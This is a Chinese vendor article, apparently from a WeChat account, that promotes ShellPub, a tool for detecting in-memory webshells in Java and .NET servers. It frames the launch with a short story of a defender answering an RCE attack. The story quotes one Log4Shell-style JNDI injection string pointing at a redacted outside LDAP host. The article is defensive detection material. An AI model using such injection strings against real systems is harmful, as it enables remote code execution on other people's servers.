内存马专杀开放下载 | 当杀疯了的内存马遇到河马
2022-8-4 09:22:41 Author: 小杰安全(查看原文) 阅读量:38 收藏

这是七月最后一天,与往日并无不同,

同样的桑拿天,同样的炎热。

并不平常,因为你在等一个信号。

虽素未蒙面,但你知道他会来。

信息大屏上各种数据不断更新,一切都显得那么平静。

旁边小哥泡面的香味,引起一阵进食的欲望。

但你只看了一眼桌角贴着的便签,记录着最新的漏洞信息:

就让你抢个先手,但也暴露了你的招式

RCE?!下一招必然会是内存马!
那么工具是冰蝎?抑或哥斯拉?

一年了,你的内存马攻击可有新的变化?

信息大屏上快速闪过几条日志信息,
“来了”,微眯的双眼迅速睁圆,
“172.16.x.xxx”,手指一片飞舞,
话音未落,已经进入相应的主机,
黑底的SSH上跳跃着一行行白色命令:
${jndi:ldap://xxxx.com.cn}
……
果然是内存马,还能有什么新花样!

也接我一招,专破内存马!

几分钟后,屏幕上跳出一行结果。

“重启吧。”你关掉ssh终端,对旁边的甲方小哥说。

“你刚刚用的是ShellPub吗?”

你转过头去,认真地说:“ShellPub,是的,但我更喜欢叫它——河马!”

ShellPub,河马内存马检测工具正式公测:


Linux版,专用于Java类内存马检测

  • 自动识别包括Tomcat、Weblogic、Jboss 环境;
  • Spring等打包环境支持手动指定进程方式,因此第三方Java应用(gitlab,ES)都可以检测;

 Windows版

  • Java内存马检测, Java6+; OA系统、办公系统;
  • Net内存马,IIS等场景下的.net内存马检测。

全面覆盖内存马常见场景,可检测冰蝎、哥斯拉等内存马利用工具注入的内存马。

河马是如何检测内存马的?


就绝大多数情况而言,内存马的恶意代码并无不同,只是因为位于内存之中,传统工具无法触达而已。既然恶意代码位于内存之中,那就到内存中去找。

但关于在哪儿检测恶意代码,目前有两种方式:

 在内存中检测

这种方法是将检测的agent注入内存中,Hook关键的类,无论内存马是动态注册,还是基于agent修改字节码,都可以预先被检测agent感知到,然后运行检测代码。

这种方法的优点很明显,即可以做到事前预防,甚至还可以主动阻断内存马的攻击。但缺点同样明显,检测agent在业务JVM中运行,占用计算资源,必然会影响到正常业务逻辑。

 在内存中找,在硬盘上检测

同样是使用agent技术,进入目标JVM中,遍历筛选可疑的类,然后dump到硬盘,将类字节码反编译为Java代码后,再进行恶意代码检测。

相比前一种检测方法,这种方法相对比较温和,对正常业务的侵入性较弱。

ShellPub河马当前既支持Agent方式检测,也支持无Agent方式检测。

尽管内存马的攻击手段越来越隐蔽,但攻防双方的技术总是螺旋上升的,只要有攻击,必然有防守,专注于Webshell查杀研究的河马也将持续努力,为大家提供使用更简便、检测更精准、高效的内存马检测工具。

如何获取内存马检测工具:


  1. 关注SHELLPUB公众号

  2. 在后台回复【winmem获取Windows内存马检测工具

  3. 在后台回复【linuxmem】获取Linux内存马检测工具

获取工具后会得到我们的交流群密码,群里有开发小哥哥为你处理BUG,也有专门的分析师帮你分析内存马样本!

点击下方名片,关注我们

如果不想错过消息,可以星标  



文章来源: http://mp.weixin.qq.com/s?__biz=MzkxNTIwMjY3NA==&mid=2247484490&idx=1&sn=015ea0f4edcd34ac3eebb5e712092163&chksm=c163f357f6147a41937ebf2cfd45bd06e6e290056cc7617a8450a31ea467ff7bde03fa0ba34b#rd
如有侵权请联系:admin#unsafe.sh